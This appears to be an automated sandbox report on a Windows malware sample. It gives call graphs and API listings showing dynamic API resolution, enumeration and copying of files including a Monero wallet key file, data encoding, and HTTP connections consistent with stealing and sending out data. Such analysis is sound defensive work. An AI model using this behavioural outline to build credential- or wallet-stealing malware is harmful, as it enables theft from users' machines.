60510->60392 60511->60428 60512->60428 60513->60426 60514->60420 60516 19a170 lstrcpy 60515->60516 60517 185169 60516->60517 60518 184800 5 API calls 60517->60518 60519 185175 60518->60519 60675 198940 60519->60675 60521 1851d4 60522 1851e2 lstrlen 60521->60522 60523 1851f5 60522->60523 60524 198940 4 API calls 60523->60524 60525 185206 60524->60525 60526 19a110 lstrcpy 60525->60526 60527 185219 60526->60527 60528 19a110 lstrcpy 60527->60528 60529 185226 60528->60529 60530 19a110 lstrcpy 60529->60530 60531 185233 60530->60531 60532 19a110 lstrcpy 60531->60532 60533 185240 60532->60533 60534 19a110 lstrcpy 60533->60534 60535 18524d InternetOpenA StrCmpCA 60534->60535 60536 18527f 60535->60536 60537 185914 InternetCloseHandle 60536->60537 60538 198600 3 API calls 60536->60538 60544 185929 ctype 60537->60544 60539 18529e 60538->60539 60540 19a2f0 3 API calls 60539->60540 60541 1852b1 60540->60541 60542 19a270 lstrcpy 60541->60542 60543 1852ba 60542->60543 60545 19a380 4 API calls 60543->60545 60548 19a170 lstrcpy 60544->60548 60546 1852fb 60545->60546 60547 19a2f0 3 API calls 60546->60547 60549 185302 60547->60549 60556 185963 60548->60556 60550 19a380 4 API calls 60549->60550 60551 185309 60550->60551 60552 19a270 lstrcpy 60551->60552 60553 185312 60552->60553 60554 19a380 4 API calls 60553->60554 60555 185353 60554->60555 60557 19a2f0 3 API calls 60555->60557 60556->60502 60558 18535a 60557->60558 60559 19a270 lstrcpy 60558->60559 60560 185363 60559->60560 60561 185379 InternetConnectA 60560->60561 60561->60537 60562 1853a9 HttpOpenRequestA 60561->60562 60564 185907 InternetCloseHandle 60562->60564 60564->60537 60676 19894d CryptBinaryToStringA 60675->60676 60680 198949 60675->60680 60677 19896e GetProcessHeap RtlAllocateHeap 60676->60677 60676->60680 60678 198994 ctype 60677->60678 60677->60680 60679 1989a5 CryptBinaryToStringA 60678->60679 60679->60680 60680->60521 60684->60039 60927 1898d0 60685->60927 60928 1898dd 60927->60928 60931 187000 60928->60931 61937 6c6ab9c0 61938 6c6ab9c9 61937->61938 61939 6c6ab9ce dllmain_dispatch 61937->61939 61941 6c6abef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 61938->61941 61941->61939 61942 6c6ab694 61943 6c6ab6a0 ___scrt_is_nonwritable_in_current_image 61942->61943 61972 6c6aaf2a 61943->61972 61945 6c6ab6a7 61946 6c6ab6d1 61945->61946 61947 6c6ab796 61945->61947 61950 6c6ab6ac ___scrt_is_nonwritable_in_current_image 61945->61950 61976 6c6ab064 61946->61976 61989 6c6ab1f7 IsProcessorFeaturePresent 61947->61989 61951 6c6ab6e0 __RTC_Initialize 61951->61950 61979 6c6abf89 InitializeSListHead 61951->61979 61952 6c6ab7b3 ___scrt_uninitialize_crt __RTC_Initialize 61954 6c6ab6ee ___scrt_initialize_default_local_stdio_options 61956 6c6ab6f3 _initterm_e 61954->61956 61955 6c6ab79d ___scrt_is_nonwritable_in_current_image 61955->61952 61957 6c6ab828 61955->61957 61958 6c6ab7d2 61955->61958 61956->61950 61959 6c6ab708 61956->61959 61960 6c6ab1f7 ___scrt_fastfail 6 API calls 61957->61960 61993 6c6ab09d _execute_onexit_table _cexit ___scrt_release_startup_lock 61958->61993 61980 6c6ab072 61959->61980 61963 6c6ab82f 61960->61963 61967 6c6ab83b 61963->61967 61968 6c6ab86e dllmain_crt_process_detach 61963->61968 61964 6c6ab7d7 61994 6c6abf95 __std_type_info_destroy_list 61964->61994 61965 6c6ab70d 61965->61950 61969 6c6ab711 _initterm 61965->61969 61970 6c6ab860 dllmain_crt_process_attach 61967->61970 61971 6c6ab840 61967->61971 61968->61971 61969->61950 61970->61971 61973 6c6aaf33 61972->61973 61995 6c6ab341 IsProcessorFeaturePresent 61973->61995 61975 6c6aaf3f ___scrt_uninitialize_crt 61975->61945 61996 6c6aaf8b 61976->61996 61978 6c6ab06b 61978->61951 61979->61954 61981 6c6ab077 ___scrt_release_startup_lock 61980->61981 61982 6c6ab07b 61981->61982 61983 6c6ab082 61981->61983 62006 6c6ab341 IsProcessorFeaturePresent 61982->62006 61985 6c6ab087 _configure_narrow_argv 61983->61985 61987 6c6ab092 61985->61987 61988 6c6ab095 _initialize_narrow_environment 61985->61988 61986 6c6ab080 61986->61965 61987->61965 61988->61986 61990 6c6ab20c ___scrt_fastfail 61989->61990 61991 6c6ab218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 61990->61991 61992 6c6ab302 ___scrt_fastfail 61991->61992 61992->61955 61993->61964 61994->61952 61995->61975 61997 6c6aaf9a 61996->61997 61998 6c6aaf9e 61996->61998 61997->61978 61999 6c6ab028 61998->61999 62001 6c6aafab ___scrt_release_startup_lock 61998->62001 62000 6c6ab1f7 ___scrt_fastfail 6 API calls 61999->62000 62002 6c6ab02f 62000->62002 62003 6c6aafb8 _initialize_onexit_table 62001->62003 62004 6c6aafd6 62001->62004 62003->62004 62005 6c6aafc7 _initialize_onexit_table 62003->62005 62004->61978 62005->62004 62006->61986

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 958 199270-199284 call 199160 961 19928a-19949e call 199190 GetProcAddress * 21 958->961 962 1994a3-199502 LoadLibraryA * 5 958->962 961->962 964 19951d-199524 962->964 965 199504-199518 GetProcAddress 962->965 966 199556-19955d 964->966 967 199526-199551 GetProcAddress * 2 964->967 965->964 969 199578-19957f 966->969 970 19955f-199573 GetProcAddress 966->970 967->966 971 199599-1995a0 969->971 972 199581-199594 GetProcAddress 969->972 970->969 973 1995d1-1995d2 971->973 974 1995a2-1995cc GetProcAddress * 2 971->974 972->971 974->973
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,013A0588), ref: 001992B1
                                    • GetProcAddress.KERNEL32(75900000,013A05A0), ref: 001992CA
                                    • GetProcAddress.KERNEL32(75900000,013A05B8), ref: 001992E2
                                    • GetProcAddress.KERNEL32(75900000,013A05D0), ref: 001992FA
                                    • GetProcAddress.KERNEL32(75900000,013A05E8), ref: 00199313
                                    • GetProcAddress.KERNEL32(75900000,013A8B50), ref: 0019932B
                                    • GetProcAddress.KERNEL32(75900000,01396360), ref: 00199343
                                    • GetProcAddress.KERNEL32(75900000,013964E0), ref: 0019935C
                                    • GetProcAddress.KERNEL32(75900000,013A0600), ref: 00199374
                                    • GetProcAddress.KERNEL32(75900000,013A0630), ref: 0019938C
                                    • GetProcAddress.KERNEL32(75900000,013A0648), ref: 001993A5
                                    • GetProcAddress.KERNEL32(75900000,013A0690), ref: 001993BD
                                    • GetProcAddress.KERNEL32(75900000,01396640), ref: 001993D5
                                    • GetProcAddress.KERNEL32(75900000,013A0660), ref: 001993EE
                                    • GetProcAddress.KERNEL32(75900000,013A06A8), ref: 00199406
                                    • GetProcAddress.KERNEL32(75900000,01396380), ref: 0019941E
                                    • GetProcAddress.KERNEL32(75900000,013A06C0), ref: 00199437
                                    • GetProcAddress.KERNEL32(75900000,013A08D0), ref: 0019944F
                                    • GetProcAddress.KERNEL32(75900000,01396480), ref: 00199467
                                    • GetProcAddress.KERNEL32(75900000,013A08E8), ref: 00199480
                                    • GetProcAddress.KERNEL32(75900000,01396320), ref: 00199498
                                    • LoadLibraryA.KERNEL32(013A0900,?,001964A0), ref: 001994AA
                                    • LoadLibraryA.KERNEL32(013A0918,?,001964A0), ref: 001994BB
                                    • LoadLibraryA.KERNEL32(013A0858,?,001964A0), ref: 001994CD
                                    • LoadLibraryA.KERNEL32(013A0870,?,001964A0), ref: 001994DF
                                    • LoadLibraryA.KERNEL32(013A0888,?,001964A0), ref: 001994F0
                                    • GetProcAddress.KERNEL32(75070000,013A08A0), ref: 00199512
                                    • GetProcAddress.KERNEL32(75FD0000,013A08B8), ref: 00199533
                                    • GetProcAddress.KERNEL32(75FD0000,013A8CA0), ref: 0019954B
                                    • GetProcAddress.KERNEL32(75A50000,013A8D90), ref: 0019956D
                                    • GetProcAddress.KERNEL32(74E50000,013965C0), ref: 0019958E
                                    • GetProcAddress.KERNEL32(76E80000,013A8B40), ref: 001995AF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001995C6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 001995BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 75017fabf5b77f5dc886dcae82fcbd16088762953b3079437304e2af8125a4fe
                                    • Instruction ID: 9abc475504c8aa4fc8cc44622fc64422a481a8b795259ed4f4e4aa56e37ee65a
                                    • Opcode Fuzzy Hash: 75017fabf5b77f5dc886dcae82fcbd16088762953b3079437304e2af8125a4fe
                                    • Instruction Fuzzy Hash: A2A14DB9520200EFC746EFA8EC88E1A3BBEB74E741F41A51AE506C3674DB349845DF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 975 184610-1846e5 RtlAllocateHeap 992 1846f0-1846f6 975->992 993 1846fc-18479a 992->993 994 18479f-1847f9 VirtualProtect 992->994 993->992
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0018465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001847EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: c91d07fa8b522dfdcf46fba82c7d8c57e7090764f570ba7f2e5cd50ef74b9fc1
                                    • Instruction ID: eb8c4afb91164b95e0411ddece24cef8b4ef6cd27a5ddc638b7c9b89f123c8b6
                                    • Opcode Fuzzy Hash: c91d07fa8b522dfdcf46fba82c7d8c57e7090764f570ba7f2e5cd50ef74b9fc1
                                    • Instruction Fuzzy Hash: 9441EF797EA788FBC72CFBA488CEE9D77675F47704F909244A81256280CFF099034666

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1590 18bcb0-18bd42 call 19a110 call 19a2f0 call 19a380 call 19a270 call 19a1d0 * 2 call 19a110 * 2 call 19a4a0 FindFirstFileA 1609 18bd81-18bd95 StrCmpCA 1590->1609 1610 18bd44-18bd7c call 19a1d0 * 6 call 181550 1590->1610 1611 18bdad 1609->1611 1612 18bd97-18bdab StrCmpCA 1609->1612 1654 18c64f-18c652 1610->1654 1615 18c5f4-18c607 FindNextFileA 1611->1615 1612->1611 1614 18bdb2-18be2b call 19a1f0 call 19a2f0 call 19a380 * 2 call 19a270 call 19a1d0 * 3 1612->1614 1660 18bebc-18bf3d call 19a380 * 4 call 19a270 call 19a1d0 * 4 1614->1660 1661 18be31-18beb7 call 19a380 * 4 call 19a270 call 19a1d0 * 4 1614->1661 1615->1609 1619 18c60d-18c61a FindClose call 19a1d0 1615->1619 1625 18c61f-18c64a call 19a1d0 * 5 call 181550 1619->1625 1625->1654 1697 18bf42-18bf58 call 19a4a0 StrCmpCA 1660->1697 1661->1697 1700 18bf5e-18bf72 StrCmpCA 1697->1700 1701 18c11f-18c135 StrCmpCA 1697->1701 1700->1701 1704 18bf78-18c092 call 19a110 call 198600 call 19a380 call 19a2f0 call 19a270 call 19a1d0 * 3 call 19a4a0 * 2 CopyFileA call 19a110 call 19a380 * 2 call 19a270 call 19a1d0 * 2 call 19a170 call 189a10 1700->1704 1702 18c18a-18c1a0 StrCmpCA 1701->1702 1703 18c137-18c17a call 181590 call 19a170 * 3 call 18a1b0 1701->1703 1705 18c1a2-18c1b9 call 19a4a0 StrCmpCA 1702->1705 1706 18c215-18c22d call 19a170 call 198830 1702->1706 1763 18c17f-18c185 1703->1763 1856 18c0e1-18c11a call 19a4a0 DeleteFileA call 19a410 call 19a4a0 call 19a1d0 * 2 1704->1856 1857 18c094-18c0dc call 19a170 call 181590 call 194c70 call 19a1d0 1704->1857 1719 18c1bb-18c20a call 181590 call 19a170 * 3 call 18a6c0 1705->1719 1720 18c210 1705->1720 1728 18c233-18c23a 1706->1728 1729 18c306-18c31b StrCmpCA 1706->1729 1719->1720 1722 18c57a-18c583 1720->1722 1732 18c5e4-18c5ef call 19a410 * 2 1722->1732 1733 18c585-18c5d9 call 181590 call 19a170 * 2 call 19a110 call 18bcb0 1722->1733 1737 18c2a9-18c2f6 call 181590 call 19a170 call 19a110 call 19a170 call 18a6c0 1728->1737 1738 18c23c-18c243 1728->1738 1734 18c50e-18c523 StrCmpCA 1729->1734 1735 18c321-18c48a call 19a110 call 19a380 call 19a270 call 19a1d0 call 198600 call 19a2f0 call 19a270 call 19a1d0 * 2 call 19a4a0 * 2 CopyFileA call 181590 call 19a170 * 3 call 18ad70 call 181590 call 19a170 * 3 call 18b370 call 19a4a0 StrCmpCA 1729->1735 1732->1615 1806 18c5de 1733->1806 1734->1722 1743 18c525-18c56f call 181590 call 19a170 * 3 call 18b0b0 1734->1743 1889 18c48c-18c4d9 call 181590 call 19a170 * 3 call 18b8e0 1735->1889 1890 18c4e4-18c4fc call 19a4a0 DeleteFileA call 19a410 1735->1890 1814 18c2fb 1737->1814 1747 18c245-18c2a1 call 181590 call 19a170 call 19a110 call 19a170 call 18a6c0 1738->1747 1748 18c2a7 1738->1748 1818 18c574 1743->1818 1747->1748 1756 18c301 1748->1756 1756->1722 1763->1722 1806->1732 1814->1756 1818->1722 1856->1701 1857->1856 1906 18c4de 1889->1906 1898 18c501-18c50c call 19a1d0 1890->1898 1898->1722 1906->1890
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindFirstFileA.KERNEL32(00000000,?,001A0B17,001A0B16,00000000,?,?,?,001A1398,001A0B0F), ref: 0018BD35
                                    • StrCmpCA.SHLWAPI(?,001A139C), ref: 0018BD8D
                                    • StrCmpCA.SHLWAPI(?,001A13A0), ref: 0018BDA3
                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 0018C5FF
                                    • FindClose.KERNEL32(000000FF), ref: 0018C611
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
